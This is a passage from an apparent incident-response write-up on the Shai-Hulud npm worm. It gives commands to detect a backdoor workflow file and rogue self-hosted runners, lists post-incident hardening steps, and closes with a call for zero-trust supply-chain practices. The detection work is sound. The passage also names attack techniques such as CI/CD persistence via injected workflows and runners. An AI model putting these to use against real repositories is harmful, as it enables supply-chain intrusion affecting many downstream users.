Scan all repositories for indicators of compromise:
# Search for the backdoor workflow
find . -name "discussion.yaml" -path "*/.github/workflows/*"
# Search for unauthorized self-hosted runners
gh api /repos/{owner}/{repo}/actions/runners | jq '.runners[] | select(.name | contains("SHA1HULUD"))'
# Review recent workflow modifications
git log --all --oneline -- .github/workflows/
Post-Incident Hardening
After containment:
- Audit all package.json files for suspicious scripts
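- Review registry publish history and any available audit logs for unusual publish activity (the npm audit command reports known vulnerabilities, not publish events)
- Implement the preventive controls detailed in the Post-Mortem Analysis section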
- Conduct developer workstation forensics to identify patient zero
- Review and rotate all programmatic credentials organization-wide
Conclusion: The End of Implicit Trust
The Shai-Hulud incident is a watershed moment for the software development industry, representing the maturation of supply chain attacks from theoretical risk to operational crisis. The campaign's technical sophistication—runtime polymorphism, anti-analysis wipers, and CI/CD persistence—demonstrates that threat actors are adapting faster than defensive practices.
However, the most important lesson is not about the attacker's capabilities, but about our industry's failure to implement basic security hygiene. Every stage of the Shai-Hulud attack chain could have been disrupted by controls that existed before the campaign began:
- Disabling automatic script execution
- Enforcing 2FA for publish operations
- Applying least privilege to CI/CD tokens
- Implementing egress filtering in build environments
- Using deterministic dependency resolution
The era of blindly trusting the npm install command must end. The convenience culture that prioritizes frictionless development velocity over security review has created an ecosystem where a single compromised maintainer account can trigger a cascading failure affecting millions of applications.
The Path Forward
Organizations must shift from implicit trust to zero trust for the software supply chain:
- Treat Package Installation as Code Execution: Because it is. Every npm install should be understood as granting arbitrary code execution privileges to hundreds of third-party maintainers.
- Implement Defense in Depth: No single control is sufficient. Layer multiple preventive mechanisms so that if one fails, others catch the attack.
- Prioritize Identity Security: In a world where credentials are the new perimeter, identity hygiene (2FA, token rotation, least privilege) is not optional.
- Adopt Secure-by-Default Configurations: Vendors must shift defaults from permissive-to-convenient to restrictive-by-default, requiring explicit opt-in for risky behaviors.
- Foster a Security-First Culture: Developers must be empowered and trained to recognize that security controls are not obstacles to productivity but enablers of sustainable development.
The Shai-Hulud worm demonstrated that sophisticated attackers will exploit every implicit trust relationship in our development infrastructure. The question is no longer whether supply chain attacks will occur, but whether we will finally prioritize the foundational security controls required to prevent them.
The sandworms of the npm ecosystem have been awakened. The choice is ours: continue with business as usual and watch them multiply, or fundamentally rethink how we build, distribute, and consume software in the age of weaponized dependencies.
The time for half-measures is over. The next Shai-Hulud is already being developed.



